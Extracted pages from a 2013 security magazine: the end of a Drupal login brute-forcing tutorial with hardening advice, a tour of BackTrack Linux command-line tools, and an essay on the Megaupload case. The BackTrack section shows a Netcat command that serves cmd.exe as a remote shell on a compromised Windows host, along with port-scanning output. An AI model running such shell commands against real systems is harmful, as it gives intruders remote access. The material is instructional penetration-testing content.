After you restarted W3AF (or reloaded the plugin) you will see the magic work. In the log file, it is marked in red. But you can also go to the results tab (Figure 5). As expected, the name and password were found. Luckily brute-forcing Drupal7 logins won't be that easy, because the default lock-out mechanism locks the user out for 6 hours after five unsuccessful tries. It will also send an email to the user to change the password.
W3AF Form brute-forcing via W3AF console
18
02/2013
How to Brute-force Drupal6 Login Pages
Now that you are finished configuring the plugins, type “back” twice and set the target URL and start the scan (Figure 10). Now open the file and search on 'vulnerability' and you'll find this line [Sun 27 Jan 2013 10:12:25 AM EST – vulnerability] Found authentication credentials to: http://localhost/drupal6/. A correct user and password combination is: kevin/useless.
Harden your Drupal installation
You can install the Drupal Login Security module to prevent brute-forcing. You can additionally install the Captcha module to make a distinction between PC and a human. Be aware that these modules might contain bugs themselves. This was the case for example for the Captcha module, that could be bypassed easily. The bug was detected 30th august 2012 but is fixed now. You can also upgrade to Drupal version 7 (or 8, which is currently still in development). Server SSO: You can move the brute-forcing problem to another server, who manages authentication, like for example an ISA (Internet Security and Acceleration) server. On that server you have the option to lock-out a user after x retries. If you lock yourself out, you can still reach the normal Drupal login page, but only after you authenticated yourself using the Server SSO.
days. Just for the record: 25 GPUs nowadays produce over 348 billion hashes per second offline. For more information visit http://arstechnica.com/security/2012/12/25-gpu-cluster-cracksevery-standard-windows-password-in-6-hours. So an 8 places password gets brute-forced in less than 6 hours. Microsoft advises to use Kerberos5. Kerberos5: Even though Kerberos provides strong encryption over the network, it can't prevent brute-force attacks against it's centralized KDC. On top of that, an attacker can downgrade and thus prevent the system to use the more advanced encryption algorithms. This vulnerability was patched but there are still systems unpatched. If you have the patched Kerberos version and a patched server, you might consider it safe. But never forget to harden the network too.
Authentication protocols I consider unsafe
NTLMv1 SSO: NTLMv1 is still widely supported but it is just not secure (eg. Rainbow cracking). NTLMv2 SSO: It looks secure, but it isn't either. There are ways to get the necessary data to start the brute force. At Black Hat they did the test, back in 2002, with 16CPUs (4 million tries/sec) they could brake a 7 places password within 10
KEVIN SIMONS
Figure 10. Setting the target URL and start the scan
www.hakin9.org/en
A consultant, working for BTR Services at Boom (BE), usually doing large development projects by other companies spread over several years. Active in the application development section, promoting secure coding and doing audits based on OWASP Top10. Also coaches people, shares his knowledge with others, and gives presentations of various topics. Besides computer science, also follows up science in general (particle physics in particular). During the weekends, he spends time with his four year old daughter. Teaches her funny creative things, and even explained her how to spoof face recognition by just using a picture.
19
Hakin9 Extra
Backtack Linux How to Ditch the Menu and Ball from the Command Line? Backtrack Linux has become more popular over the years as businesses had been losing money because of data breaches through malware infections or targeted attacks. The media has caught on and realized that these breaches are not only fascinating to the businesses themselves or the so called nerds or geeks that resolve their issues but the general public is interested in these data breaches which makes Information Security huge news in 2013.
T
he end result is a snowball effect that appears to only be picking up steam. One outcome from the snowball effect is the fact that more people are hired into Information Security with less experience. It is not uncommon in todays market to see people working in the Information Security industry that don't know their way around Linux from the command line or, as we sometimes call them, GUI (Graphical User Interface) robots. The same effect was seen with ISP’s in the late 90’s when people were hired with little to no experience regarding basic TCP/IP networking skills. We all started out knowing little to nothing about security or about Linux, so those that spend time poking around the Linux CLI (Command Line Interface) will surely be on their way to becoming Security Ninjas. I always tell friends that I grew up with that if I can learn this material you surely can as well. It comes down to effort and what life sacrifices you are willing to make to elevate your game to the next level. This article is a crash course in Backtrack Linux command line tools that will familiarize you with various locations where tools you have never heard of exist.
us who have been doing this for a long time, can remember when we had to compile every single tool we used, and it may have taken an entire day just to work through issue after issue that used to materialize with new applications or new ideas. It is amazing how far Linux has come in the past five years and I am looking forward to where it is going to be in five more. The goal of this article is to familiarize you with numerous directories located within the Backtrack Linux directory structure, where tools that didn't make it into the Backtrack menu system or the Backtrack /pentest directory are located. I encourage you to use these examples as an opportunity to explore each directory further and see what gems await. Don’t limit yourself to the minimal amount of information in this article but use it as a blueprint to investigate Backtrack in-
Introduction
In the text to follow I provide quick examples of various tools available from the command line in Backtrack Linux. The Backtrack menus already provide an overwhelming amount of tools that will allow you to accomplish almost anything you need in a penetration test or security audit. However, if you never get past the Backtrack menu system, you will be doing yourself a huge disservice. If you want to advance to the next level in your career break away from the norm and explore. Many of
20
02/2013
Backtack Linux – How to Ditch the Menu and Ball from the Command Line?
side and out. While you test the below examples take extra time and perform an ls in each directory where the tools in the examples are located. Then, take it a step further and run man "application-name", "application-name" -h, or "application-name" --help against each application or script that listed with the ls command. I have split the below sections by directory where the example tools are located and attempted to provide less known examples to show that there are so many hidden gems in Backtrack you could spend weeks or months simply exploring them without ever mastering a single item. So buckle up, drop into a shell, and ball from the Backtrack Linux command line. :/bin – User Binaries :Examples – ls, ip, ps, rm, umount
If you are familiar with Linux at all, then you have likely run commands that exist in this directory. There are not a ton of security related tools in the /bin directory but there is one application that is on the most well-known security tools list. That command is Netcat, which is fairly basic, yet powerful in the sense that it can create backdoors or shovel data between servers with ease. It should be noted that Netcat run from the command line is the same as nc run from the command line and many people use nc exclusively because its easier to type two letters instead of six. While working on the command line in Linux you can use the "which" command to see the full path to the application you are running as shown in the below example. In this example we show that just because you are issuing a command from a specific directory it doesn’t mean that is what is actually running. If this happens to be a Linux server that you
do not control or potentially had a breach of some sort its important to know what is happening when you run a specific command. You do not want to be the guy on the security team who triggers extra damage without even knowing it was triggered. In this example, we show that while running nc is not malicious it is not simply running nc from the bin directory, but in fact is linked to a file in another directory which in turn is linked to nc.traditional back in the /bin directory. Familiarize yourself with egrep, grep, ls, and which as part of the path to balling on the Backtrack Linux command line (Listing 1). The point of the above output is to become familiar with the Linux command line and to provide an example of things not always being what they seem. It is important to understand your environment and the commands you are running. Now let’s see some of what Netcat can actually accomplish by creating a Netcat listener on a Windows server, make a connection to the listener from Backtrack, and run a command on the remote Windows server to prove the connection. The below example assumes you have already gained access to a Windows server and placed nc.exe or Netcat for Windows on the server. In this example the Windows server is located at 192.168.1.75 and the Backtrack server is located at 192.168.1.78 (Listing 2). In the above output a Netcat listener that was offering the Windows Command Prompt or cmd. exe was created on port 80 of the Windows server. Then, we connect to the listener using Netcat from the Backtrack Linux server and immediately we are dropped into Command Prompt on the remote server, which is confirmed by running the netsh command on Windows to display the IP of the Windows server itself. Backtrack actually pro-
Listing 1. Use which, ls, grep, and egrep to investigate netcat and nc root@bt:~# which nc /bin/nc root@bt:~# which netcat /bin/netcat root@bt:~# ls -alh /bin | egrep ‘nc |netcat ‘ lrwxrwxrwx 1 root root 20 2013-01-08 06:41 nc -> /etc/alternatives/nc lrwxrwxrwx 1 root root 24 2013-01-08 06:41 netcat -> /etc/alternatives/netcat root@bt:~# ls -alh /etc/alternatives | egrep ‘nc |netcat ‘ lrwxrwxrwx 1 root root 19 2013-01-08 06:41 nc -> /bin/nc.traditional lrwxrwxrwx 1 root root 19 2013-01-08 06:41 netcat -> /bin/nc.traditional root@bt:~# ls -alh /bin/ | grep nc.traditional -rwxr-xr-x 1 root root 27K 2008-06-21 18:51 nc.traditional root@bt:~#
www.hakin9.org/en
21
Hakin9 Extra
vides Windows binaries such as nc.exe in the /pentest/windows-binaries directory, so be sure to explore the windows-binaries sub directories to spark ideas of tasks you can accomplish on compromised Windows systems. Netcat can accomplish much more than the above example so be sure to read the man page to understand more of its capabilities. If you like what you see regarding Netcat but would prefer encrypted connections between servers, look into the sbd command. At this point you get the idea that there are things to explore in the /bin directory so lets move on to the next one we are going to touch on in this article which is /sbin.
:/sbin – System Binaries :Examples – fsck, iptables, reboot, route
The /sbin directory as noted above should contain system level binaries such as the examples listed in the title. Understanding sockets and how they work is critical to being in the Information Security industry so if you are not familiar with the tools mentioned in the following paragraph, please take the time to read man pages, search on the Internet, read a book, or do whatever it takes to provide yourself with a solid foundation regarding sockets. The tool we are going to dig into in /sbin is called ss, which is a utility used
Listing 2. Open Netcat listener on Windows server and connect from Backtrack Netcat Run From Windows Server -192.168.1.75 C:\Users\alex\Desktop>nc -L -p 80 -e cmd.exe
Netcat Run From Backtrack Server – 192.168.1.78 root@bt:~# nc 192.168.1.75 80 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\alex\Desktop>netsh interface ip show addresses “Local Area Connection” netsh interface ip show addresses “Local Area Connection” Configuration for interface “Local Area Connection” DHCP enabled: No IP Address: 192.168.1.75 Subnet Prefix: 192.168.1.0/24 (mask 255.255.255.0) Default Gateway: 192.168.1.1 Gateway Metric: 256 InterfaceMetric: 10
C:\Users\alex\Desktop>exit root@bt:~#
Listing 3. Listing only TCP sockets using ss on Backtrack Linux root@bt:~# ss -t -m State Recv-Q Send-Q ESTAB 0 0 mem:(r0,w0,f0,t0) ESTAB 0 0 mem:(r0,w0,f0,t0) ESTAB 0 0 mem:(r0,w0,f0,t0) ESTAB 0 0 mem:(r0,w0,f4096,t0) root@bt:~#
22
Local Address:Port 192.168.1.78:ssh
Peer Address:Port 192.168.1.75:55560
192.168.1.78:ssh
192.168.1.199:54389
192.168.1.78:www
192.168.1.75:55571
192.168.1.78:ssh
192.168.1.199:53998
02/2013
Backtack Linux – How to Ditch the Menu and Ball from the Command Line?
to investigate sockets. You might be familiar with netstat, which is an amazing command line utility that can quickly provide you details of socket connections from fully established to somewhere else in the process of being established, including timed out. If you are not familiar with netstat, check out its capabilities by typing “man netstat” from a terminal window in Backtrack or dive right in by typing netstat –rn to display the route table in Linux, and netstat –antpu to display all TCP/ UDP connections in numeric form. The ss command expands on netstat by providing even more details such as information about each socket connections memory usage when using the –m switch. The example we provide below is going to provide simple output of active TCP sockets and their memory usage (Listing 3). In the above output we can see that there appear to be four established connections which include three SSH sessions and a single HTTP session. The connections are made from two different hosts to the Backtrack Linux server where the ss command was run, which is located at 192.168.1.78. While there isn’t much memory information because the connections are sitting idle, the point is the socket memory information is available and comes in handy when troubleshooting connections between servers, or when attempting to fingerprint
services on a specific server. The ss command is an extremely powerful socket investigation utility like each of the other tools being mentioned in this article could fill the entire length of this text. Take the time to investigate each of the commands available in the /sbin directory on Backtrack Linux and you will surely find some hidden gems! Are you starting to see a pattern here? There are amazing applications, commands, scripts, binaries, etc. hidden all over Backtrack and all it takes is digging in to raise your game to the next level. Next, we are moving on to the /usr/bin directory where I wanted to touch on some zip file utilities that never get mentioned as well as a couple other random tools. :/usr/bin – Non-essential command binaries :Examples – curl, gcc, scp
The /usr/bin directory is the location of thousands of different commands within Backtrack and there will not be a shortage of commands you have never seen before. Ever heard of mechdump? Me neither until I started writing this article. This is one of the reasons that I love Backtrack as it’s the gift that keeps on giving and not in the way we are used to when that phrase is used as this gift doesn’t itch. The mech-dump com-
Listing 4. Query zip file contents for details, encrypt files inside of a zip file, and query the encrypted files root@bt:~# zipinfo three-text-files.zip found file ‘README.TXT’, size 1556 (811) 95 54 4d 8f d3 48 10 bd 47 ca 7f 28 : 71 81 91 12 93 99 65 found file ‘Readme31.txt’, size 1306 (681) 95 54 4d 6f db 30 0c bd 07 c8 7f e0 : 2d 2d 90 b8 49 b7 61 found file ‘Release Notes.txt’, size 872 (455) 8d 52 cb 6e db 40 0c bc 0b d0 3f f0 : d8 16 b1 62 39 45 81 root@bt:~/cloak# root@bt:~/cloak# zipcloak three-text-files.zip Enter password: Verify password: encrypting: README.TXT encrypting: Readme31.txt encrypting: Release Notes.txt root@bt:~/cloak# root@bt:~/cloak# zipinfo three-text-files.zip found file ‘README.TXT’, size 1556 (823), encrypted c0 0c 8c 45 ca c6 f6 73 17 d9 e0 73 : d6 4e 0f a5 d5 88 5b found file ‘Readme31.txt’, size 1306 (693), encrypted c2 ac 51 63 a7 7d df 9d 0c 28 b4 31 : 5b 63 b4 da 78 c4 7a found file ‘Release Notes.txt’, size 872 (467), encrypted 15 b4 7c 27 56 16 87 2d a8 c7 02 b3 : 5a 4f c0 7d c0 5d f3 root@bt:~/cloak#
www.hakin9.org/en
b5 28 da 45 ac 45 b0 61 1f 5d e6 66 b8 49 6a
96 b6 9a a5 1b 9e 42 5d 35 3e 0c 76 42 cb e2
23
Hakin9 Extra
mand provides a quick way to analyze a website by dumping for four sections of data that include the headers, a list of forms, a list of links, and a list of images on the page. The headers information, as you know, can provide you a ton of great information about target web servers. The example commands we are going to take a quick look at in the /usr/bin directory include zipinfo and zipcloak. Both of these commands you have probably guessed correctly already, deal with zip files by zipinfo providing information about specific zip files on a server and zipcloak by providing a simple method to encrypt each file within a zip file. Let’s take a look at zipinfo and zipcloak in action by first querying a zip file using zipinfo, encrypt the text files in the zip file using zipcloak, and then querying the file again with zipinfo to see what the difference is. The zip file we are using in this example is named three-text-files.zip and again you guessed correctly – it contains three text files (Listing 4). So you might ask whats the big deal knowing if a zip file is encrypted or what files exist within a zip archive? Ever get a zip file from a shady coworker who may want to send your world crashing down, or from that neighbor down the street that asked you why the sound wasn’t working on their computer, only for you to spend Sunday afternoon helping them troubleshoot with an end result of you clicking the unmute button? Well, zipinfo provides you a method to never miss one of those fancy chain letters again (I hear you have a relative in Zimbabwe who wants to send you USD $4.5 million once you send them $5,000) by first verifying its not bundled with the latest malware. Now zipcloak is slick regardless because you can encrypt the files on Backtrack and send to other Linux users to decrypt, as well as Windows users who can decrypt using pretty much anything as well. I tested decrypting zip files on Windows that were encrypted with zipcloak on Backtrack using Windows Explorer, Winrar, and 7zip without any issues at all. Listing 5. Determine if you are on a Desktop or a Laptop using laptop-detect located in /usr/sbin on Backtrack Linux root@bt:~# laptop-detect -v We’re not on a laptop (no relevant hint found) root@bt:~# root@bt:~# laptop-detect -v We’re a laptop (dmidecode returned Portable) root@bt:~#
24
None of the commands in this article are mind blowing but again, the point is to continue to beat this into everyone’s mind that Backtrack is so much more than the couple hundred tools in the menu system. I mean Linux is so much more in general as it provides you the freedom to accomplish whatever it is you want to accomplish. Take the time to look around all of the Backtrack directories mentioned in this article and familiarize with tools that you have never thought about using because you didn’t know they existed, and it will take your “Linux Fu” to the next level. Let’s move on to the /usr/sbin directory as we still have numerous directories to get through, and I could likely babble about a single directory or a single command for longer than anyone would care to pay attention. :/usr/sbin – Non-essential system binaries :Examples – arp, cron, snort
The /usr/sbin directory is minimal when compared to /usr/bin on Backtrack Linux. Don’t let that fool you as this is just as important as the other directories being mentioned in this article. One interesting tool in /usr/sbin is ntfsclone which provides a method to generate an image file of a NTFS mount. While performing penetration testing, it is common to run across NTFS (New Technology File System) shares that have minimal or no security at all thus providing you a method to mount that share without issue. As part of your deliverable to the client you could say here is a thumb drive with an image file of XyZ servers NTFS share. That is the type of data that proves success to clients. I mean things can be explained to clients or screenshots taken and provided to clients, but nothing says you are owned quite like handing them a thumb drive with a single image file that contains all of their proprietary data. Another tool in /usr/sbin that I ran across for the first time while writing this article is laptop-detect, which is pretty interesting. All laptop-detect does is attempt to determine if you are on a laptop or not. Say you have a goal of compromising a C level executive’s personal laptop then you might get closer to your goal faster by using laptop-detect. Below we show example output of laptop-detect run from a desktop and then laptop-detect run from a laptop. In the scenario below laptop-detect was on the money (Listing 5). The amount of random scripts and goodies that are hidden all over Backtrack Linux never ceases to amaze me. While laptop-detect isn’t anything to write home about in terms of complexity, it is pretty awesome that it even exists. Imagine if you were
02/2013
Backtack Linux – How to Ditch the Menu and Ball from the Command Line?
familiar with every tool located in Backtrack Linux? You might own the world by now! Another really great tool in /usr/sbin is a firewall management tool called ufw. If you need to lock down Linux in less than 60 seconds then ufw will provide you what you need. By the way, these 60 seconds includes typing “man ufw” and finding the examples you need to make packets disappear. With any firewall or firewall management tool you should be extremely careful when configuring things, because it’s pretty easy to mess things up and end up locking yourself out. At that point, you will have such a secure server you won’t even be able to access your own data. So when I say sixty seconds I mean it, however the point is the fact that ufw is an amazing tool you don’t hear enough about. Then take iptables, which is considered l337 (elite) and cool, yet if you were new to Linux it would require three bottles of aspirin just to read the man page. The ufw firewall management tool would allow someone newer to firewalls, Linux, and technology a pretty solid solution with minimal ramp up time. Check it out and then thank the Backtrack devs later for putting together an absolutely amazing collection of tools. In the end exploring Backtrack Linux directories has to beat watching reruns of Friends or that must see football game unless of course it’s the other football and its World Cup season. I mean think if you spent all of your time learning versus deflating in front of the TV? You might accomplish things ini-
tially thought impossible. Again, I say to my friends I grew up with all the time that if I can even figure out how to log in to a computer, then the chances are that all of them could be writing exploits next week. A solid point made by exploring all of these directories, tools, commands, etc. is the fact that if you need to accomplish something, the chances are someone out there has needed to accomplish that same task before and the tool likely exists. It is always worth a quick search to verify you are not reinventing the wheel and that rings especially true during penetration tests. The end goal is to accurately provide the client as much detail in terms of vulnerabilities or attack vectors as possible in what always seems too short of a time period. Do you think the client feels they are getting what they paid for when half of your time was spent writing a script to accomplish something already accomplished by someone else? How happy would that client be if that tool already existed and you just spent half the allotment of your billable time reinventing the wheel? The more time you familiarize with the Backtrack command line, the more random gems will appear. :/usr/local/bin – local data – binaries specific to this host :Examples – None
A typical Linux installation likely wouldn’t have any files in /usr/local/bin to begin, as this is
Listing 6. Application mapper amap issued from the Backtrack CLI root@bt:~# amap localhost 53 amap v5.4 (www.thc.org/thc-amap) started at 2013-01-29 21:48:31 - APPLICATION MAPPING mode Protocol on 127.0.0.1:53/tcp matches http Protocol on 127.0.0.1:53/tcp matches http-apache-2 Unidentified ports: none. amap v5.4 finished at 2013-01-29 21:48:37 root@bt:~# root@bt:~# amap 192.168.1.119 22 25 135 139 445 1025 3389 amap v5.4 (www.thc.org/thc-amap) started at 2013-01-29 22:02:02 - APPLICATION MAPPING mode
Protocol on 192.168.1.119:139/tcp matches netbios-session Protocol on 192.168.1.119:25/tcp matches smtp Protocol on 192.168.1.119:445/tcp matches ms-ds Protocol on 192.168.1.119:3389/tcp matches ms-remote-desktop-protocol Protocol on 192.168.1.119:22/tcp matches ssh Protocol on 192.168.1.119:22/tcp matches ssh-openssh Protocol on 192.168.1.119:1025/tcp matches netbios-session Protocol on 192.168.1.119:135/tcp matches netbios-session Unidentified ports: none. amap v5.4 finished at 2013-01-29 22:02:21 root@bt:~#
www.hakin9.org/en
25
Hakin9 Extra
where command binaries specific to a specific installation are installed. The third party applications or commands you are installing on top of the base Linux system would typically reside in /usr/local/bin. Backtrack Linux is a bit different because there are so many third party tools installed by default. This is the default location for well-known tools such as hydra, nmap, and traceroute in Backtrack Linux. If you are not familiar with nmap and you work in Information Security, then I suggest you go purchase Gordon Fyodor Lyon’s NMAP Network Scanning book, which is a steal for around $30. Read NMAP Network Scanning not once but twice and expand your horizons. Again though, when you look deeper and you start noticing tools that are not located in the Backtrack menu system or in the /pentest directory, you start finding all sorts of goodies. Take amap for example, which attempts to identify the applications that are running on various ports. Sure there are other ways to accomplish this but the more tools you possess at your fingertips, the quicker you will dominate the environments you roam. Check out the example below where I first moved the Apache web server on the localhost to port 53 to see how amap responded, which ended up being right on the money. Following this first example of amap, I show a scan against a Windows 2000 Server that has maybe a couple open ports and likely some vulnerable services (Listing 6). As you can see above, amap isn’t super fancy but it provides another method to identify applications running on any port. I have seen amap get tripped up and provide false negatives when too many ports are investigated at once, so if you get any port failures, attempt amap again and include a single port that failed to make sure that you are not getting incorrect results. Another great tool in /usr/local/bin that isn’t always mentioned is randpkt which is a random packet generator. Say you need to test an application like Wireshark by seeing how it reads specific types of malformed packets. Generate a pcap (Packet Capture) file in seconds using randpkt and open the pcap in Wireshark (Listing 7). Above we show a simple example of randpkt generating a pcap file with 1000 ARP packets. The Listing 7. Random packet generator randpkt generating a pcap file root@bt:~# randpkt -t arp arp.pcap
root@bt:~#
26
randpkt output isn’t very exciting but the contents of the pcap file that is output get me a little excited! :/usr/local/sbin – local data system binaries specific to this host :Examples – None
The
directory is similar to /usr/ local/bin in the sense that this is where third party applications you have installed will likely end up. Instead of command binaries like /usr/local/bin, the application daemons and such will be located in /usr/local/sbin. While there are under 100 applications in /usr/local/sbin by default in Backtrack, there are some great tools located here that are not detailed in the Backtrack menus. Many tools from the aircrack-ng suite of tools are located in /usr/local/sbin, including aireplay-ng, airmonng, and airodump-ng. There are also a couple really cool snarf looking applications located in /usr/local/sbin, including filesnarf, urlsnarf, msgsnarf, and mailsnarf. I have all four on my list of command line tools I want to investigate more as they will likely take playing around with them for a bit before they operate properly. I find myself modifying tools in Backtrack all the time and I encourage others to do the same. The golden rule is before you start modifying things, just make sure that you have solid backups. Linux is an operating system platform that was made to be modified, broken, built on, etc. so don’t be shy! Just make sure that you back things up and also make sure you never take credit for something someone else accomplished before you. Take your time and be patient. Backtrack’s motyo states “when the going gets tough, try harder!” If you are like me the passion will burn inside you and keep you up for days at a time. Explore every square inch of every Operating System you can get your hands on. Just because you love Linux products doesn’t mean that you have to hate Microsoft products or Apple products, because unfortunately outside of the server market the lion share of business related computers (specifically laptops/desktops) run on Windows followed by OSX followed by Linux. As far as Linux has come, it still has a ways to go in my opinion before your going to catch the majority of average users popping open terminals. Think of the bright side of thin – if you love Backtrack and familiarize yourself at a minimum with the directories listed in this article, you will likely be in the top 1% of computer users in the world. This also brings up a great point about Backtrack and the fact that we are dealing with Open /usr/local/sbin
02/2013
Source software, so don’t expect everything to always simply work. All of these tools are free and the Backtrack devs who pour the blood, sweat, and tears into Backtrack are much of the time doing so without pay. Please stop and think about that for a moment. Every single one of these tools has donated hours put into it and putting all of these tools together has an entire second set of hours into rounding them all up and doing an absolutely amazing job keeping things updated, providing support to the community, and really putting time back into InfoSec. I happen to be best friends with one of the Backtrack devs who goes by purehate as we grew up in the same neighborhood in Louisville, KY, parted ways at one point fifteen years ago or so, and reconnected about 4 years ago only to find out that we were both pretty deep into InfoSec. The point there is the fact that I have witnessed firsthand the effort that Backtrack devs put into this operating system that we all use and I just want to say loud and clear that when you see these guys, they deserve a thanks for building something that has made all of our lives easier. Buy these guys a meal, go out of your way to let them know that it’s appreciated, or how about not just jumping down their throats on IRC or on the Backtrack message boards when something is wrong. I can promise you that none of them are getting rich off of providing us this free resource.
Alex Kah
Alex Kah is a member of the Accuvant LABS Enterprise Attack and Penetration Testing Team and has consulted on technologies ranging from various VoIP platforms to GPU rendering farms to auto-scaling completely virtualized environments. Alex has over 15 years of experience in Information Technology working with industries including security, telecommunications, technology, gaming, healthcare, and media. Working out of his small Highlands office in Louisville, KY, USA Alex also founded Question-Defense.com, an online collection of technical articles and co-founded tools.question-defense.com (with Martin Bos), an automated online password cracking site. He holds a Bachelor’s degree in Information Technology and a Master’s degree in Business Administration along with various IT certifications. While he is not breaking things he is well trying to fix them.
www.hakin9.org/en
hakin9 OnDemand
The Rise and Fall
of Megaupload.com and Kim Dotcom, and the Possible Implications for the Internet-based World of Piracy and Theft of Intellectual Property In January 2012 the U. S. Government took down the Megauploads.com website and then quickly filed charges against the owner, Kim Dotcom, and his colleagues for alleged “copyright infringement, conspiracy to commit money laundering, racketeering, rewarding users who uploaded pirated content for sharing, and turning a blind eye to requests from copyright holders to remove copyright-protected files.”
K
im Dotcom and his colleagues were arrested a few hours later in New Zealand and await extradition to the U.S. to be tried for these charges. Conviction on these charges could result in severe fines and possibly many years in a U.S. Federal prison. This paper will discuss the rise and fall of Kim Dotcom and Megauploads.com and it will review issues how lawful governments may treat similar offenses in the future. The Rise and Fall of Megaupload.com and Kim Dotcom, and the Possible Implications for the World of Internet-based Software Piracy and Theft of Intellectual Property. Less than 24 hours after end of the global SOPA Protest on the world wide web, on January 19, 2012, the governments of the U.S. and New Zealand acted swiftly to stop the Megauploads.com empire that Kim Dotcom had built. The U.S. Department of Justice shut down the Megaupload. com website and produced a 72-page federal indictment against Kim Dotcom, Megaupload.com, and several of the business partners for alleged “copyright infringement, conspiracy to commit money laundering, racketeering, rewarding users who uploaded pirated content for sharing, and turning a blind eye to requests from copyright holders to remove copyright-protected files. Almost 12,000 miles away, on January 20, 2012, New Zealand’s law enforcement authorities were forcibly entering Mr. Dotcom’s home, a leased luxury mansion in the serene New Zealand countryside, and forcing their way into a “safe room”
28
where Mr. Dotcom was hiding with guns, cash, and his closest colleagues (Acohido, 2012). Mr. Kim Dotcom and his colleagues were then arrested and now await extradition to the U.S. to be tried for these charges. Conviction on these charges could result in severe fines and possibly many years of imprisonment in a U.S. Federal prison. This paper will discuss the rise and fall of Kim Dotcom and Megaupload.com and it will review issues how lawful governments may treat similar offenses in the future. Originally as Kim Schmidt, Mr. Dotcom, a native citizen of Germany, began is computer career in Germany in his early 20s in the early 1990s. He first began his career as a “computer expert” and then very shortly afterwards opened a computer security-related business. A short time later, Mr. Schmidt was indicted in Germany on computer fraud charges and later paid a fine and was released on probation. A few years later, Mr. Schmidt changed his named legally to “Kim Dotcom”, perhaps as a prelude to starting the Megaupload.com business, and to position himself as a self-styled Internet mogul entrepreneur. Now as a 38-year old German foreign national and temporary resident of New Zealand, at 6 feet 6 inches tall and over 285 pounds, Mr. Kim Dotcom, is both in stature and in his actions, a larger than life figure, who openly flaunted his wealth and his playboy lifestyle, the obvious results of the success of his Megaupload.com business (MikelVizualBazzikHck, 2012). With an annual income of more
02/2013
Megaupload.com and Kim Dotcom
than $30 million, the flamboyant Mr. Dotcom could afford nearly everything he wanted, except permanent citizenship as a New Zealander. Yet after his arrest on January 20, 2012, he and his colleagues were incarcerated in a New Zealand jail, awaiting extradition to the U.S. to stand trial for the charges listed in their U.S. federal indictment (Acohido, 2012)” However, Mr. Dotcom and his colleagues were initially denied the right to post bail to obtain temporary freedom because they were deemed by the local magistrate as a “severe flight risk” due to the vast amount of wealth at their disposal.
At his arraignment on January 23, 2012, Mr. Dotcom and his codefendants audaciously denied all the charges in their indictment, claiming total innocence (Booth, 2012). At this moment, Mr. Dotcom, his fellow incarcerated colleagues, and their legal defense team are continuing to vigorously fight extradition on grounds that the U.S. does not have the legal standing to indict them for the charges listed in the federal indictment. Nevertheless, the manner in which the authorities in New Zealand apprehended Mr. Dotcom and his colleagues while New Zealand soil, while the
References
• Acohido, B. (2012). Government takedown of Megaupload leads to new fears. An article published at USATODAY.com website on January 20, 2012. Retrieved from the web at http://www.usatoday.com/tech/news/story/2012-01-20/megaupload-arrests-FBI/52697186/1 on January 21, 2012. • The American Dream. (2012). According To The FBI, Internet Privacy Is Now Considered To Be Suspicious Activity. An article published at endoftheamericandream.com. retrieved from the web at http://endoftheamericandream. com/archives/according-to-the-fbi-internet-privacy-is-now-considered-to-be-suspicious-activity on February 4, 2012. • Booth, R. (2012). Kim Dotcom Denies Internet Piracy. An article published on Monday, January 23, 2012 at the Guardian.co.uk website. Retrieved from the web at http://www.guardian.co.uk/technology/2012/jan/23/kim-dotcom-denies-internet-piracy on January 23, 2012. • Bright, A. (2012). Kim Dotcom: Are such Internet sensations pirates or hactivists? An article published at CSMONITOR.com. Retrieved from the web at http://www.csmonitor.com/World/Global-Issues/2012/0125/Kim-Dotcom-Aresuch-Internet-sensations-pirates-or-hactivists/Kim-Dotcom on February 5, 2012. • Business Software Alliance. (2010). 2010 Piracy Impact Study:the economic Benefits of reducing software piracy. Retrieved from the web at http://portal.bsa.org/piracyimpact2010/studies/piracyimpactstudy2010.pdf on February 5, 2012. • Business Software Alliance. (2009). 2009 Software Piracy on the Internet: A Threat To Your Security. Published at Wired.com. Retrieved from the web at http://www.wired.com/images_blogs/threatlevel/2009/10/bsareport.pdf on February 5, 2012. • Flacy, M. (2012). Megaupload owner found hiding in safe room with sawed-off shotgun. An article published at Digitaltrends.com on January 21, 2012. Retrieved from the web at http://www.digitaltrends.com/web/megauploadowner-found-hiding-in-safe-room-with-sawed-off-shotgun/ on February 5, 2012. • Halzack, S. (2012). Megaupload indictment returned with charges added for Kim Dotcom and others. An article published at the WashingtonPost.com website on February 17, 2012. Retrieved from the web at http://www.washingtonpost.com/business/economy/megaupload-indictment-returned-with-charges-added-for-kim-dotcom-and-others/2012/02/17/gIQAAXBNKR_story.html on February 20, 2012. • MikelVizualBazzikHck. (2012). MEGAUPLOAD: US Govt yet to present Evidence against Kim Dotcom (3 News). A Youtube.com video posted by MikelVizualBazzikHck. Retrieved from the web at http://www.youtube.com/ watch?v=7Fg7_f6-S0I&feature=related on January 30, 2012. • Neuman, J. (2009). Debunking BSA’s piracy-malware link. An article published at MYCE.com on October 15, 2009. Retrieved from the web at http://www.myce.com/news/debunking-bsas-piracy-malware-link-21041/ on February 5, 2012. • Paoli, C. (2012). Anonymous Retaliates With Gov., Media Web Site Shutdowns After Megaupload Arrests. An article published at Redmondmag.com on January 19, 2012. Retrieved from the web at http://redmondmag.com/articles/2012/01/19/anonymous-retaliates-after-megaupload-arrests.aspx on January 20, 2012. • RT.com. (2012). US courts already enforcing SOPA-style shut-downs. An article published on December 20, 2011 at RT.com Retrieved from the web at http://rt.com/usa/news/us-court-sopa-morris-203/ on February 14, 2012. • Ryan, J. (2012). Megaupload Back in High Tech Whack-a-mole. An article published at the ABCNews.com website. Retrieved from the web at http://abcnews.go.com/Technology/megaupload-back-high-tech-whack-mole/ story?id=15405292 on January 20, 2012. • Tassi, P. (2012). You Will Never Kill Piracy, and Piracy Will Never Kill You. An article published at Forbes.com on February 3, 2012. Retrieved from the web at http://www.forbes.com/sites/insertcoin/2012/02/03/you-will-never-kill-piracy-and-piracy-will-never-kill-you/ on February 5, 2012. • Tsukayama, H. (2012). Report: Megaupload founder released on bail. An article published at the WashingtonPost. com on February 22, 2012. Retrieved from the web at http://www.washingtonpost.com/business/technology/reportmegaupload-founder-released-on-bail/2012/02/22/gIQA7hjBTR_story.html on February 22, 2012. • U.S. Department of Justice. (2012). Federal Indictment against Kim Dotcom, Megaupload.com, et al. A U.S. Government document published at USATODAY.com website on January 20, 2012. Retrieved from the web at http://i. usatoday.net/tech/pdfs/12-0120-megaupload-indictment.pdf on January 21, 2012. • U.S. Department of Justice. (2012). The Superseding Federal Indictment Against Kim Dotcom, et al. Published on February 16, 2012 at the WashingtonPost.com. Retrieved from the web at http://www.washingtonpost.com/wp-srv/ business/documents/megaupload-indictment.pdf on February 22, 2012.
www.hakin9.org/en
29
hakin9 OnDemand
